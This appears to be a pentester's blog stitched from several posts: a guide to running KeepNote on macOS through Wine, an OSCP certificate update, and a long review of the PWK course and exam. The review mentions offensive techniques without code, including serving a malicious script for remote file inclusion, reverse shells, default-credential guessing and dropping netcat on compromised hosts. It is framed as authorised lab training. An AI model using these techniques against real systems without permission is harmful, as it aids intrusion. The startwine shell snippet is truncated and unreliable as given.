Running KeepNote on a Mac

During my PWK training, I absolutely fell in love with KeepNote.  I used it extensively for tracking all the different networks, all the hosts in that network, all the different scan results and loot I’d collect on each, and also general notes about attack vectors I had tried, what worked, what didn’t work, what to explore, little code snippets or Linux commands for easy copy-and-paste use later, links to helpful articles…you get the picture.

Unfortunately, KeepNote isn’t very well-maintained.  As of this Fourth of July, the latest versions uploaded to the main site are five years old.  The original developer did put it on Github two years ago, but there haven’t been many pull requests accepted since then and he obviously doesn’t have the time to keep up with it anymore.  Totally understandable, but it sucks because I haven’t found a good, well-maintained replacement for it.

And believe me, I’ve tried!  Evernote, Bear, nvALT, desktop wikis like Zim, the macOS Notes app, and on and on.  No one else is doing, or even offering an option to do, the same kind of UI layout.  I don’t know why, but the three-pane arrangement of KeepNote just hits the spot for me.  The outline on the left side, submenu on top right, and notes section on bottom left; no one else arranges their app like this.


For real, this is my happy place.

Even after finishing the OSCP, I still use KeepNote for everything from CTFs to client engagements.  It works fine in Linux and is even included in the package managers of Debian and several other distributions.

On Mac…eh, not so much!  Getting the dependencies right is a little frustrating, at least if you’re using Homebrew.  For example, KeepNote requires PyGTK and Glade…but you have to install Glade with PyGTK (brew install –with-libglade pygtk).  If you install the packages separately, it won’t run.  Most frustrating of all is that, once you do get it running, the clipboard doesn’t work right!  You can’t copy or paste anything into or out of the app, for whatever reason.

“So why not just use it in Kali?” you might be asking.  And I do, all the time.  But recently, I had a huge internal pentest engagement for a client with several internal Class A networks.  The only way to access this client was through a macOS VM running in VMware Fusion that was set up with their VPN and other software.  I don’t know why, but macOS VMs run like shit.  I was doing all this on a 2015 MacBook Pro with an i7 and 16 GB of RAM, and even with ample system resources, opening a second VM (with Kali on it) caused the macOS one to slow to a crawl…even though the internal Activity Monitor said everything was fine and system utilization was low.  I’m guessing it has something to do with the subpar VMware Tools available for macOS, which doesn’t support 3D acceleration and some other features.  And I’m sure macOS being a closed-source operating system that’s tied to branded hardware doesn’t help matters either.

A couple of Class A subnets is a lot of ground to cover and I wasn’t given a lot of time to dive deep, so I was constantly bounce from host to host to test out this or that weak point and having a hard time keeping up with the notes.  Given the aforementioned VM troubles, my note-taking app was going to have to either run on the VM or my host OS, both of which are macOS Sierra.

While I entertained exploring the intricacies of Python and macOS clipboard operation and trying to write a patch myself, a much easier thought occurred to me: KeepNote is available as a pre-compiled installable Windows app!

I’ve had a lot of good luck with Wine on Mac, especially since they developed the Mac-specific driver for it and you don’t have to be shackled to XQuartz anymore.  So I tried a few different ways to get KeepNote running inside macOS and here are my results.

TL;DR – The Easiest (and Nicest Looking) Way: WineBottler

WineBottler is a great little program for creating pretty wrappers around Wine apps.  This way, it’ll package KeepNote into a nice .app file that you can put in your Mac’s Dock and launch.  When you install WineBottler, you also get a pre-packaged version of Wine called that can be used across different WineBottler-wrapped apps or for running other Windows binaries on macOS.  This version of Wine isn’t as current as what you’d get from installing via Homebrew and you’re limited to 32-bit Windows apps only, but it’s new enough to include the Mac driver and works perfectly fine with KeepNote.  In my testing, it was the easiest, most stable, nicest-looking, and smallest (more on that later) way to run KeepNote in macOS.


My recommended WineBottler settings

The screenshot above shows my recommended install settings.  KeepNote doesn’t require Mono or Gecko, so leave them out and save yourself lots of space.

Once it’s installed, you get a version of KeepNote with it’s own Dock launcher/icon that integrates nicely with macOS, including being able to copy and paste into and out of the app.  If you have “Use system tray icon” enabled, it’ll put a little KeepNote icon up in the right side of the Mac’s menu bar, but it doesn’t really do anything so I just disabled it in KeepNote’s “Preferences.”


KeepNote running inside it’s own WineBottler wrapper in macOS


So one oddity with the Wine Mac driver is that the stock version leaves the Option and Command keys on a normal Apple keyboard useless.  You’d think they’d at least map them to the Alt and Windows (or Super, if we’re being platform-agnostic) key functions or even offer some configuration option.  But alas, they don’t.  You can do Xmodmap stuff with X11…but then you’d have to use XQuartz.

Fortunately, the packaged version that comes with WineBottler maps Command to serve as extra Control keys, so you can use Mac-style shortcuts for copying and pasting.  You won’t really miss the Windows key, as KeepNote doesn’t use it from what I can tell.  If you want to hack the driver a little and add Option = Alt, check out the last section of this post.

Another nice feature of WineBottler is that it will find the Windows icon and automatically make it the icon for the .app bundle.  I also have a nicer-looking (IMHO) version of the KeepNote icon in Mac-compatible .icns format that you can download here.

The Other Easiest (But Not As Nice-Looking) Way: Homebrew and AppleScript

I’m sure you’re no stranger to Homebrew, the excellent macOS package manager.  The other super-easy way to run KeepNote is to simple run “brew install wine” and then “wine <the path and filename of your Windows KeepNote installer>” in your terminal.

You can also make a simple launcher using the Script Editor (formerly AppleScript Editor) and choosing to save it as an “Application.”  Here’s one I cribbed from the official Wine site.

on run

--edit this to be the correct location and file to run (typically only edit after the "drive_c")

 set toRun to "$WINEPREFIX/drive_c/Program Files (x86)/KeepNote/keepnote.exe"

--edit winePrefix if you are not using the default prefix

 set winePrefix to "$HOME/.wine"

--edit wineLocation if your wine install is not the default location

 set wineLocation to "/usr/local/bin"

--edit dyldFallbackLibraryPath to your X11 lib folder, this one is set for XQuartz on 10.6+

 set dyldFallbackLibraryPath to "/opt/X11/lib"




 set toRunPath to do shell script "WINEPREFIX=\"" & winePrefix & "\"; TEMPVAR=\"" & toRun & "\"; echo \"${TEMPVAR%/*}\""

 set toRunFile to do shell script "WINEPREFIX=\"" & winePrefix & "\"; TEMPVAR=\"" & toRun & "\"; TEMPVAR2=\"" & toRunPath & "\"; echo \"${TEMPVAR#$TEMPVAR2/}\""

do shell script "PATH=\"" & wineLocation & ":$PATH\"; export WINEPREFIX=\"" & winePrefix & "\"; export DYLD_FALLBACK_LIBRARY_PATH=\"" & dyldFallbackLibraryPath & "\"; cd \"" & toRunPath & "\"; wine \"" & toRunFile & "\" > /dev/null 2>&1 &"

end run

So while doing it this way is nice, easy, and gets you the latest version of Wine available, there is one downside.  If you put the launcher in your dock, even if you’ve given it a fancy custom icon instead of the default AppleScript one, Wine will still open as a separate app with it’s own Dock icon.  You end up with the same problem if you make the .app bundle in Automator too.  Some people might see this as a minor quibble, but it does bug me.


As you can see, the icons are a little redundant

The Easy (But Bloated) Way

Wineskin is another way to package Wine apps so that they integrate more beautifully with the Mac experience, but it has one big disadvantage: it’s enormous!  Unlike WineBottler, you can’t externalize the Wine install to use across apps, so every Wineskin-wrapped app has to contain the full install of Wine bundled within it.  Also, there didn’t seem to be an easy way to keep it from installing Mono and Gecko with every app (I dug two layers deep into the advanced settings and said, “Fuck it!”).  Total all this up and you’ve turned a 30 megabyte app into a 600 MEGABYTE app!  The WineBottler-wrapped version, by comparison, is just under 48 MB.

It does offer some deeper customization options than WineBottler, with a lot of different Wine versions and engines to choose from, but even the compressed engines still end up tipping the scales at 300 meg or so.  So yeah, if you want nice Dock integration, just stick with WineBottler.

Another Less Bloated (But Unstable) Way

I already use the latest version of Wine pulled from Homebrew and I was kind of ambivalent about having to use the redundant just to get a nice Dock launcher.  If you open up a WineBottler bundle, the actual binary it executes is just a bash script called “startwine” that looks in a few possible locations for your Wine binary, then uses it to execute the Windows program.

You can easily edit it to point to your Homebrew-installed version of Wine instead (the portion I added is in bold):


BUNDLERESOURCEPATH="$(dirname "$0")/../Resources"

#find wine, try in Bundle, ~/Applications, /Applications, Spotlight
if [ -f "$BUNDLERESOURCEPATH/Wine.bundle/Contents/Resources/bin/wine" ]; then
 export WINEUSRPATH="$BUNDLERESOURCEPATH/Wine.bundle/Contents/Resources"
#adding Homebrew Wine support
elif [ -f "/usr/local/bin/wine" ]; then
 export WINEUSRPATH="/usr/local/var/homebrew/linked/wine/"
elif [ -f "$HOME/Applications/" ]; then
 export WINEUSRPATH="$HOME/Applications/"
elif [ -f "/Applications/" ]; then
 export WINEUSRPATH="/Applications/"
elif [ -f "$(mdfind 'kMDItemCFBundleIdentifier == org.kronenberg.Wine' | grep -m 1 '')/Contents/Resources/bin/wine" ]; then
 export WINEUSRPATH="$(mdfind 'kMDItemCFBundleIdentifier == org.kronenberg.Wine' | grep -m 1 '')/Contents/Resources"
 echo "Wine not found!"
 exit 1


This will run…buuuuuuuuuuuut it tends to be a tad more unstable than usual.  It’s especially crash-prone when right-clicking around to change the icons on pages or when resizing the main KeepNote window.

I just wanted to point out that you can easily do it if you wish, but you’re better off sticking with WineBottler’s version of Wine.

Fixing Keyboard Mappings

One last note: if you’re unhappy with the key mappings, it’s not too hard to manually change them with a hex editor.  Wine is open source and you could go to the trouble of compiling a new Mac drive, but I find this way easier.

What you want to look for the Mac drive file, you’ll find it in the following locations.

  • In the Homebrew version of Wine:
    • /usr/local/var/homebrew/linked/wine/lib/wine/ (32-bit version)
    • /usr/local/var/homebrew/linked/wine/lib64/wine/ (64-bit)
  • In /Applications/

A good post on Stack Overflow explains which values to change in the compiled library.  To map the Command keys to be extra Control keys and turn the Option keys into Alts…

The exact address is going to change from version to version, so just look for these values near each other:


And change them to these:


I haven’t messed with it to, perhaps, turn the right Command key into a Windows key, but you could easily do it.

In conclusion, KeepNote runs pretty well inside Wine and is much more usable than running it straight from Python, sadly.  It does crash from time to time, but it does that in Linux too and it’s good at autosaving and preventing data loss.  The only thing I wish I could do is get the options for opening notes in external text editors, image viewers, etc. to work with my Mac apps…but alas, the Wine pseudo-Windows file paths throw them off.

Hope this post has helped you and enjoy your using KeepNote on Mac!

Custom KeepNote Dock Icon


OSCP Update

Look what came in the mail a few weeks ago!

For the curious, it took about a month for them to send the paper certificate and a little hard-plastic credit card sized version via DHL courier.  They send you an email asking where you want it mailed, just in case you’ve switched apartments or something in between registering and passing the exam.

Also, I realized in my previous OSCP review that I forgot to mention a few things.  I’ll list them here and also add them as an update to the original review post.

Things I Found Useful *UPDATE*

python -m SimpleHTTPServer 8080: a one-liner I still use on a daily basis.  A lot easier and quicker than turning Apache on and off, in my humble opinion.  Also nice because when you run it in your terminal, it prints all the incoming requests.  So not only is it handy for hosting your malicious script or PHP, it’s also handy for quickly fuzzing for RFI on a web app.  In fact, I got my foothold on one of the target boxes specifically because I was using this one-liner and it allowed me to see the incoming RFI (and troubleshoot that an additional file extension was getting tagged on and keeping my script from running).  I usually use “8080” for the port, but you can change it at the end, in the case where it’s conflicting with another app or you’re trying to get around firewall restrictions.  On every Linux and Mac I use, I keep this in my .bashrc with the alias “pythonwebserver”.  Be aware that it’s “python -m http.server 8000” on Python 3, in case your environment uses it instead of the more common Python 2.x versions.

The Exam *UPDATE*

Something I found useful for keeping focus and blocking any outside noise was some good music while I hacked.  When I’m trying to focus intensely, I found something instrumental is best for a background soundtrack.  I’m sure a lot of you might like classical music of some sort, or maybe techno or retrowave…I’ll confess that I have a thing for video game music covers.  In particular, I was listening to a lot of Minibosses and Bit Brigade to keep me pumped and get through the exam.  If you’re into rock covers of NES music, I highly recommend them.  You can buy all their stuff on Bandcamp, iTunes, and other places.

My OSCP Experience

**Update (11/4/2016) – added a few bits back in from this post

A few weeks ago, I “tried harder” and was awarded the Offensive Security Certified Professional (OSCP) certification.

As many people before me have done, I decided I’d post a little writeup of my experience with the Pentesting With Kali (PWK) online training and taking the OSCP exam (twice).

As you probably know by now, the OSCP is Offensive Security’s certification for penetration testing using the Linux distribution they maintain, Kali Linux.   The accompanying course, Pentesting With Kali (PWK), gets you a PDF lab guide and a series of instruction videos covering the different topics of the guide, from basic network enumeration to writing buffer overflow exploits.  You’re also purchasing VPN access to their hands-on lab environment of dozens of different vulnerable hosts for you to probe and exploit.  To attain the OSCP certification, you take a hands-on exam in which you’re given VPN access to a special exam network and are alotted 24 hours to compromise as many systems as possible, plus an additional 24 hours to write up and submit your exam penetration test report.

I signed up for the 90-day course, bought a one-month extension after I ran out of time (mostly for going back over machines to write the huge lab report…more on that later), I bombed my first attempt at the exam, purchased a two-week extension in order to bone up on some stuff and get a retest attempt, then passed it on my second try.

The Cost, Signing Up, and Getting your Employer to Pay For It

I’ve wanted to take OffSec’s training for a long time and I should’ve just sucked it up, ponied up the money, and took it years ago.  I fought for over a year at my previous employer to get them to finance it.  I was ready to give up arguing with them and buy it myself before I landed in my current job.  Thankfully, where I work now has a healthy training budget for its pentesters and all I had to do was put it on the corporate card.

If you’re already on a pentest or vulnerability assessment team, the value of the OSCP is pretty obvious.  If you’re of the blue team persuasion, there’s a case to be made also.  You’re probably used to telling developers that they should fix that SQL injection vuln in their web app because attackers could use it to get access to internal systems; or telling a sysadmin he needs to update bash on his Linux server because attackers could use Shellshock to get into it…but how?  Learning pentesting (via a course such as the OSCP) gives you an understanding of just how attackers leverage vulnerabilities and exploit systems.  It can give you a much deeper understanding of how attacks really work and prepare you to explain to more resistant customers just how this or that vuln can be exploited and how far an attacker can take it.

$1150 USD for three months of lab time and an exam attempt sounds like a lot, but if you think about it, it’s still a lot cheaper than SANS courses, a college course on pentesting, or most other cert’s boot camps.  If you can get your employer on board to pay for it, awesome!  If not, but you have the money to spend, I think it’s some of the best training you can get.

You’ll need a non-free email account to sign up (so no Gmail or Yahoo).  If you use your work email, I recommend specifically adding to your contacts and/or whitelisting any email from the domain.  The spam filter where I work is very aggressive and doesn’t like Offsec’s domain, for some reason.  You wouldn’t want to be late for your exam because some shitty spam filter blocked the email with the VPN info and password from coming in.

PWK is in high demand, so expect to not be able to start your lab time immediately.  When I signed up, I picked a start date and had to wait a month or two before I could connect over the VPN and start.  When purchasing additional lab time, however, you’ll get access back instantly.

Lastly, PWK is a self-directed course. There’s no instructor there who’s going to hold your hand and show you all the answers.  It’s up to you to motivate yourself, study up on different tools and exploits outside of the course cirriculum, and work through problems on your own in order to pwn all the hosts on the lab network.  If you’re the right sort of person to get into pentesting and infosec, this probably isn’t a problem for you.

Prerequisites and Preparation

You could sign up for PWK as a total Linux and security newb…but you’d probably waste weeks of your lab time self-studying on remedial subjects.

Your lab time is precious (and costs money), so you definitely want to get the most out of it that you can by studying up beforehand on some important subjects.  My own goal was to try to do as much self-studying beforehand as possible and maximize the amount of lab time I could devote to owning boxes and having fun in the lab.


First and foremost, you need to be a competent Linux user.  When I taught my CNS320 class, I used to set up Linux Mint VMs and run my students through this tutorial from the University of Surrey in the UK.

The Linux Command Line is a good starter book, available in a free electronic version or as a book from No Starch Press.  The author’s website also has some good material on learning Linux and shell scripting.

Another dead tree option is How Linux Works, which is a great book on using Linux and understanding the nuts and bolts of the OS.

Obviously, there are a ton of online tutorials and books to choose from.  You might also look for O’Reilley books or study guides for the CompTIA Linux+ certification too.

The best way to accelerate your learning is to do it, whether accompanied with an instruction website, book, or totally on your own.  Specifically, force yourself to use the Linux command-line shell.  Make a Kali VM in VMware or Virtualbox and start practicing moving files, piping input and output, using command-line text editors, and other tasks.  Get comfortable with it.

You don’t have to have sysadmin-level knowledge or be LPIC certified in order to do well on the OSCP…but it probably doesn’t hurt.  I’m a bad gauge for how much Linux you should know for PWK because I’d been using it at work and at home for almost a decade.

Despite having taught a course on it, the CEH isn’t terribly helpful.  I taught my CNS320 course way more like it was PWK than the truly awful training material that EC-Council provided.


Another subject that will help immensely is to be comfortable in a scripting language.  I would recommend learning some Python and some bash scripting.

I originally learned Python using Codecademy‘s free course.  This was before they started charging for the Pro version, so I’m not sure if all the same stuff is available for free anymore or not.  Much as with Linux, there are thousands of websites and books to choose from if you want to learn Python.  I like it because it’s very simple and quick to learn, yet offers lots of powerful modules and options.  Plus, it’s popularity means that answers to any of your questions, erorr messages you might get, etc., are easily found on Google.  Lots of the exploits you’ll see in the labs and all over Exploit-DB are written in Python.

If you already know some Python and want to take your pentesting skills with it to the next level, check out this presentation and accompanying series from Primal Security.

Another handy scripting language to pick up, and which is covered a little in the lab guide, is bash scripting.  Bash (short for Bourne Again Shell…old Unix joke, long story) is the default command-line shell on most Linux distributions and has it’s own built-in scripting language for automating commands.  The bash scripting language isn’t the most intuitive in the world and I’m not really all that fond of it…but I kinda force myself to use it because it’s so ubiquitous in the Linux world and can come in handy if you’re on a system that doesn’t have Python or some other more modern scripting language.  The aforementioned Linux books usually have some good info on bash scripting and the Linux Documentation Project also has a bash beginner’s guide that I read through when preparing.

Other than that, just some basic code literacy is helpful.  PWK doesn’t expect you to write a lot of code, but you need to know how to read it and have a basic understanding of what some exploit written in C or C++ is doing.

VulnHub and CTFs

The best way to learn anything is to do it, which is a philosophy that PWK and the OSCP embrace whole-heartedly.  A great way to start doing is to try your hand at some different capture-the-flag (CTF) challenges.  CTFs are very popular in the pentesting and hacker community as a challenging and entertaining way to test out your skills.

Big security conferences like DEFCON, Derbycon, and Shmoocon have in-person CTFs, if you’re lucky enough to be able to attend such events.  You can also find plenty of online CTF events that you can register for and compete.  Of the ones I’ve done, I especially like Derbycon’s CTF, as it is put on pentest-style with a network of vulnerable machines to exploit, much like PWK.  Most CTFS are in the “Jeopardy-style” format, with little individual challenges in different categories, such as crypto or web app hacking.  These are fun, but not terribly relevant to PWK/OSCP. is a good source for finding current and upcoming CTF events, both in-person and online.

My recommendation for getting some hands-on practice before PWK is to download some specially-made challenge VMs and practice attacking them on your own time.  VulnHub is the definitive source for challenge VMs that you can download, run in VMware of Virtualbox, and practice attacking.  The De-ICE and Kioptrix series are great for beginners and I used them to teach my classes with.

If you get stumped (and you will), each entry on VulnHub also lists links to walkthroughs where you can learn how others were able to successfully exploit them.  This is great for building your initial knowledge and getting you ready for PWK.  I’d even recommend that after you exploit one, go back and ready multiple people’s walkthroughs for it and see how their methodologies and techniques may have differed.


You’ll learn a lot about penetration testing tools and techniques in the labs.  I also recommend you take a look at the PWK syllabus and see if anything on there looks unfamiliar or makes you nervous.  You might want to study up on such topics before you schedule your PWK course.

Two particular tools that I think you’d benefit from pre-studying and getting really comfortable with are the Metasploit framework and netcat.

Metasploit is very handy, not just for the exploits packaged in it, but for it’s awesome Meterpreter shell, msfvenom utility for making shellcode, and it’s packaged scripts for finding and exploiting buffer overflows.  There are two great sources for learning about Metasploit.  One is Offensive Security’s own free online Metasploit Unleashed course.  The other is the Metasploit: the Penetration Tester’s Guide book from No Starch Press, which is co-authored by Mati “muts” Aharoni himself.  The book is a little out-of-date; the biggest changes being msfcli’s functionality being rolled into the msfconsole command and msfpayload and msfencode being combined into the msfvenom tool.  Otherwise, the examples and guides in it are all solid.  Just a little hint: some of the examples the book gives will show up in the PWK lab.

Netcat is another simple, yet extremely versatile tool that it would behoove you to spend some time on and become a ninja with before you start PWK.  Netcat (usually found somewhere in the /bin/ or /usr/bin/ directory on most Linux distros as simple “nc”) is an old Unix tool for setting up TCP and UDP connections.  There are several variants available in Kali, including socat (which supports sockets), cryptcat (which encrypts the connections that netcat makes), and my personal favorite, ncat.  Ncat is an updated version of netcat that comes packaged with nmap and supports new features like IPv6, encryption, etc.  There’s plenty of good tutorials online for getting comfortable with it, like this one and this one.  Many Linux and BSD distros use the OpenBSD version of netcat, which disables the “-e” option.  This doesn’t actually stop you from setting up bind shells and reverse shells, only makes it a little more complicated.  More on that later.

Other Helpful Material

Two more things that I don’t feel are really necessary, but have helped me out as a pentester, are learning to use vi/vim and the Red Team Field Manual.

Vi is short for “visual editor” and is a command-line text editor for Unix/Linux.  Vim stands for “vimproved” and is an updated version.  Just about every Linux or Unix distro has vim installed and “vi” is just a shortcut to it…but you might come across old installs that still use classic vi or specifically symlinks “vi” to a version of “vim” set to mimic the old behavior (which has some annoying quirks, like having to use h,j,k, and l instead of arrow keys for moving around).  When I got into pentesting, I forced myself to learn vi and vim.  The reason why is because: 1.) you aren’t always going to have a GUI session on a box and be able to use gedit or leafpad, and 2.) not every system is going to have “nano” installed on it.  “Vi” is the standard Unix text editor, so you will always find it installed on every Linux or Unix distribution. has a great online tutorial app for learning it or you can run the “vimtutor” command in the Linux or Mac OS X terminal to get vim’s builtin tutorial.

The Red Team Field Manual is a very handy little quick reference to different OS, database, and hacking tool commands.  It’s great to thumb through when you might not know exactly what to google for and is invaluable if you’re ever pentesting in an environment with no outside internet access.  Like I said, not necessary at all, but it’s small, cheap, and worth keeping in your laptop bag.

Taking the Course

Once you’re in, start watching the videos and working through the lab guide.  Do all the exercises and write the answers done (it’s good for extra credit on your exam).  Once you’ve powered through that, it’s time to start powering through the labs.

The lab guide and videos will show you a lot of the things you need to know to get up and running.  If you feel really lost, the forums have a great official thread walking you through pentesting the “alpha” host and will be adding walkthroughs of “beta” and “gamma” in the future.  The real point of the lab, however, is for you to figure things out yourself and find a way to compromise each host.

During my lab time, I was able to compromise almost all of the hosts on the public network, including Pain and Humble, two of the supposedly “hardest” VMs on the network.  I had footholds into the Dev and IT networks, but didn’t have much lab time left to delve further into them.  Plus, pivoting into these networks is slooooooooooow (as in real-life pivoting) and it’s really frustrating to have your pivot machine reset by some asshole while you’re right in the middle of hacking a host in the deeper network.

For me, at least, it’s kinda hard to pick up and put down attacking lab VMs.  I liked to devote several uninterrupted hours to it each day.  While my employer was nice enough to bankroll it, I didn’t get time during the work day to pursue it.  For me, I’m married and have a small child, so my only time to do it was at night from 8 PM on, once my son was in bed.  I’d usually stay up until midnight or 1 AM doing labs every night, maybe a little during the day on weekends, if I didn’t have anything else going on.

So for me, as someone who already had a background in pentesting, getting ~4 hours a day to pursue it, I owned most of the Public network in my initial three months.  As I mentioned before, my extensions were mostly to go back through stuff to make the enormous lab report and then a quick refresher after my first failed attempt at the exam.  Obviously, your mileage is going to vary based on how much self-study you have to end up doing on the side and how much time you have to devote to it.

I know a young kid with no pentesting background who could only afford one month and he was able to power through and get about as much done as I did.  I don’t think he slept much during that month, but hey, if you’re determined, you could do it in a month.

I personally recommend buying the full three-month package, as it’s not that much more than the 30- or 60-day package, and you’ll get more time to have fun hacking the targets in the lab.

Exploiting Targets

One thing that took me a while to get used to is that the PWK lab is very heavily geared towards using software and OS exploits to gain access or escalate privilege.  If you’ve done a lot of CTFs on VulnHub, you might be more used to exploiting bad configurations or shitty sudo settings to get root.  You’ll definitely see that too, but it felt like usually the way forward was either an exploit off of Exploit-DB or simple password brute-forcing.

The one, biggest, most important piece of advice I can give you is:


By the time you’re done, “nmap -A -p- <IP address>” should be permanently etched in your brain.  Scan every port on a box, figure out what service is running on every open port, figure out what software they’re using for that service, find out what version of it is running…find out EVERYTHING!  If you start asking for help in the forums or on IRC, that’s probably the most common tip you’ll get (besides “try harder”).  There isn’t any kind of sophisticated security on the network or any of the hosts, so don’t worry about trying to be stealthy or low-and-slow; hit them as hard as you can.

The tools I probably used the most for enumeration were nmap, enum4linux (if you see SMB or Samba ports on a box), nikto, and dirb.  I know a lot of folks like dirbuster, but I prefer dirb as it’s on the command line, runs fast, and has a good default wordlist.  Nmap has a lot of special scripts built into it for further enumerating services you find, under /usr/share/nmap/scripts/, and you can get more info on what they do using the –script-help option or by going to nmap’s documentation site.

One other important note: scan all 65,535 TCP ports on any box you encounter (“-p-” is the shortcut in nmap for that), but for UDP scans, just use the nmap default (ie, “nmap -sU <IP address>”).  It would take you a few weeks to successfully scan all the UDP ports on a given box over a slower VPN link.

I had a friend who spent days running hydra and trying to brute-force every web app, RDP, Telnet, SSH, and FTP instance he could find.  I found that to be entirely unneccessary.  Any time I came across some service requiring a password (usually an admin portal for a web app), I would do three things:

  • Google to see if that particular software had any sort of default credentials when you first install it and try those out
  • Went through some very simple bruteforcing (like trying root/password, admin/admin, that sort of thing)
  • As I compromised more hosts,  I saw there were several recurring characters in the story of the fake company you’re supposed to be hacking in the PWK labs.  So I started trying out their usernames and different simple passwords or passwords I discovered during post-exploitation (like cracked hashes, passwords left in plaintext files, etc.)

This isn’t just something to do in the PWK labs; this is just a good all-around practice to do in any real world pentest you find yourself in.  Your mileage may vary, but I found wide scale, intense brute-forcing to be unnecessary.  Hopefully that’ll save you some time.

Also, remember that you’re sharing the lab environment with a lot of other students.  When you’re in the lab, you have a control panel site where you can revert any of the target VMs back to the original state, in case some attacker has messed up a service or crashed the box.  To minimize stepping on other people’s dicks, I would avoid going after machines that had just been reverted within the last hour or so.  If a VM’s last refresh was hours or days ago, I figured no one else was attacking it and it would be safe for me to go after it.

Before you attack any box, GO REVERT IT.  That way, you know it’s fresh, untampered-with, and you won’t have to wonder if your exploit failed because someone else ruined the service or because you did something incorrectly.

While you’re doing the labs, START WRITING THE LAB REPORT.  You can find the format and requirements here.  It isn’t mandatory to write up a lab report, but if you do, it’s good for extra credit on your OSCP exam that might just push you over the edge if you just short of passing.  Writing up the lab report is a huge time drain and I spent weeks writing mine.  Luckily, I didn’t need it, but I would’ve been kicking myself if I’d needed it and couldn’t bust it out in time.  I used KeepNote in Kali to keep a running hack log of every machine I was attacking, scan output associated with it, different web directories I discovered, notes on software versions and possible exploits, commands I ran to generate shellcode for it, etc.  What I tried to do was keep a running log of everything so that someone could read it and repeat my results.  Obviously, if you like Evernote or some other note-keeping software better, go for it; but keep good notes!

Getting Help

Shortly after I started my PWK, they moved from IRC to the new Support site.  The IRC channel is still around, but I never really used it.  There is a bot that will give hints for different boxes, but I never found them terribly useful.  In fact, they usually didn’t make sense until after I’d already compromised the box and only then would I understand the cryptic hint.

I know some people would try to message admins and ask for advice, but that usually just results in being told to “try harder.”  I only ever talked to an admin if I thought something was actually wrong with the box or I was having some sort of issue with the control panel site or my VPN.

The OSCP forums were the best source of hints whenever I found myself stuck on a machine.  Since I signed up, they’ve reorganized them to make it much easier to find and ask for help on a specific machine.

Things I Found Useful

The /usr/share/ directory: I don’t think they really mention in the lab guides just how much useful stuff is buried in the /usr/share/ tree.  For one thing, it’s the standard location for most application’s associated data, like Metasploit’s module files and buffer overflow scripts or nmap’s NSE scripts.  For another, OffSec has put some really useful stuff in here, like a collection of web shell written in different languages, wordlists for several different brute-forcing purposes, a directory with some useful Windows binaries like nc.exe for you to drop on compromised Windows hosts, and more.

Reverse Shell Cheat Sheet: pentestmonkey’s site overall is great, but this page especially.  You aren’t always going to be able to drop Meterpreter or find netcat on a target, so it helps to know multiple ways to get a reverse shell with what’s available to you.

Windows Exploit Suggester: there are a couple of other Windows privesc suggester programs, but I like this because you just have to copy/paste the output of the “systeminfo” command, you don’t have to drop and run any binaries on the target machine.  It’s good for narrowing down which exploits to try out.

Windows Privilege Escalation Fundamentals: this is a guide you’ll often see recommended in the OffSec forums.  When there isn’t some obviously vulnerable version of Windows or software on the box, these steps can help you tease out the path to full Administrator or SYSTEM rights on a box.

Basic Linux Privilege Escalation: g0tmi1k is one of the OffSec forum admins and often does great write-ups of CTF challenges on VulnHub and elsewhere.  This is the definitive checklist of steps to run through when trying to root a Linux box.

Exploit-DB: seeing as how it’s maintained by OffSec, obviously Exploit-DB is going to be a source of a lot of the exploits you end up using in the labs.  Security Focus is probably the #2 site for exploit info, but isn’t as well-organized.  You can also use the “searchsploit” tool inside Kali to query Exploit-DB from the command line.

Google: if you aren’t already, you will be a Google wizard before this course is through.  Whether it’s looking up attack techniques, tutorials for unfamiliar tools, exploit code, documentation for vulnerable software you find, or default passwords for said software, you’ll be doing a lot of self-study and research.

Brosec: shameless plug for my friend Gabe Marshall‘s command-line reference tool.  Very handy for quickly looking up how to use query the Windows registry, how to write a one-line Python reverse shell, or other common hacker tasks.

python -m SimpleHTTPServer 8080: a one-liner I still use on a daily basis.  A lot easier and quicker than turning Apache on and off, in my humble opinion.  Also nice because when you run it in your terminal, it prints all the incoming requests.  So not only is it handy for hosting your malicious script or PHP, it’s also handy for quickly fuzzing for RFI on a web app.  In fact, I got my foothold on one of the target boxes specifically because I was using this one-liner and it allowed me to see the incoming RFI (and troubleshoot that an additional file extension was getting tagged on and keeping my script from running).  I usually use “8080” for the port, but you can change it at the end, in the case where it’s conflicting with another app or you’re trying to get around firewall restrictions.  On every Linux and Mac I use, I keep this in my .bashrc with the alias “pythonwebserver”.  Be aware that it’s “python -m http.server 8000” on Python 3, in case your environment uses it instead of the more common Python 2.x versions.

The Exam

Before you do anything: read the official OSCP Certification Exam Guide!  Then read it again!  Make sure you’re crystal clear on what you need to do in the exam, which is basically document all your steps so it’s repeatable and take screenshots before and after all your exploits.

Like with signing up for the labs, you won’t be able to sign up today and take your exam tomorrow.  The first available times are probably going to be several weeks out, so prepare accordingly.  You’ll get 24 hours of access to a private lab environment with several hosts in it, each of them having different point values for getting root/admin on them, totaling up to 100 points.  You need a minimum of 70 to pass and you can get up to 10 points of extra credit for writing up the lab guide exercises and making the lab report.  After that, you get an addition 24 hours to write up your exam report and email it to OffSec.  You’ll find out within a few business days whether you passed or not.  Once you’ve passed, you get a link to page to fill out where you want your paper certificate mailed, you get access to the OSCP Certified section of the Offensive Security forums, and you can change your forum name from your OSID to one of your choosing.

I scheduled both of mine to start on a Friday at 9AM, as my son’s in daycare that day (and wouldn’t be tempted to come up to my office and want to play).  My first time, I only got about 40 points worth of flags and wasted hours chasing a dead end.  I took stock of what happened, learned some lessons from it, and scheduled to take the exam again two months later.  The second time around, I had 80 points by the evening of that day, so I was actually able to sleep, and spent the remaining time trying to figure out the last box on the network I hadn’t compromised.

Like most exams, time management is key to success.  While all your scans are running, work on another part of the exam.  If you get stuck on one target, just take a break and move on to another one.  Take time to rest and eat during the exam, as you aren’t going to make any progress when it’s 3AM and you’re exhausted and hungry.

You can use Metasploit auxilliary, exploit, and post modules against only one machine of your choosing during the exam.  The first time, I saved it for a machine where it was pretty clear what the exploitable service was, but the code on Exploit-DB for it was nightmarish spaghetti.  I opted to use the Metasploit module for it instead and it worked.  My second time around, I didn’t really need Metasploit for any of the boxes.  I ended up trying it on that last box that eluded me, just for shits and giggles, but it didn’t help.

Something I found useful for keeping focus and blocking any outside noise was some good music while I hacked.  When I’m trying to focus intensely, I found something instrumental is best for a background soundtrack.  I’m sure a lot of you might like classical music of some sort, or maybe techno or retrowave…I’ll confess that I have a thing for video game music covers.  In particular, I was listening to a lot of Minibosses and Bit Brigade to keep me pumped and get through the exam.  If you’re into rock covers of NES music, I highly recommend them.  You can buy all their stuff on Bandcamp, iTunes, and other places.

